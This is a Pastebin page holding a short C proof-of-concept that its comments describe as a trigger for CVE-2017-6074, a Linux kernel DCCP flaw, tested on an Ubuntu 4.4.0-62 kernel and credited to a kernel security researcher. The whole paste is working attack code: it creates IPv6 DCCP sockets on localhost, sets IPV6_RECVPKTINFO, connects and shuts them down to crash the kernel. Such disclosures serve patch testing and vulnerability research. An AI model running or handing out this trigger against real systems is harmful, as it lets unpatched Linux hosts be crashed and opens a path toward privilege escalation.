poys

11

Dec 23rd, 2017
384
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.15 KB | None | 0 0
  1. // A trigger for CVE-2017-6074, crashes kernel.
  2. // Tested on 4.4.0-62-generic #83-Ubuntu kernel.
  3. // https://github.com/xairy/kernel-exploits/tree/master/CVE-2017-6074
  4. //
  5. // Andrey Konovalov <[email protected]>
  6.  
  7. #define _GNU_SOURCE
  8.  
  9. #include <netinet/ip.h>
  10.  
  11. #include <sys/ioctl.h>
  12. #include <sys/mman.h>
  13. #include <sys/socket.h>
  14. #include <sys/stat.h>
  15. #include <sys/syscall.h>
  16. #include <sys/types.h>
  17.  
  18. #include <stdarg.h>
  19. #include <stdbool.h>
  20. #include <stddef.h>
  21. #include <stdint.h>
  22. #include <stdio.h>
  23. #include <stdlib.h>
  24. #include <string.h>
  25. #include <unistd.h>
  26.  
  27. #include <arpa/inet.h>
  28.  
  29. int main() {
  30. struct sockaddr_in6 sa1;
  31. sa1.sin6_family = AF_INET6;
  32. sa1.sin6_port = htons(20002);
  33. inet_pton(AF_INET6, "::1", &sa1.sin6_addr);
  34. sa1.sin6_flowinfo = 0;
  35. sa1.sin6_scope_id = 0;
  36.  
  37. int optval = 8;
  38.  
  39. int s1 = socket(PF_INET6, SOCK_DCCP, IPPROTO_IP);
  40. bind(s1, &sa1, 0x20);
  41. listen(s1, 0x9);
  42.  
  43. setsockopt(s1, IPPROTO_IPV6, IPV6_RECVPKTINFO, &optval, 4);
  44.  
  45. int s2 = socket(PF_INET6, SOCK_DCCP, IPPROTO_IP);
  46. connect(s2, &sa1, 0x20);
  47.  
  48. shutdown(s1, SHUT_RDWR);
  49. close(s1);
  50. shutdown(s2, SHUT_RDWR);
  51. close(s2);
  52.  
  53. return 0;
  54. }
Advertisement
Add Comment
Please, Sign In to add comment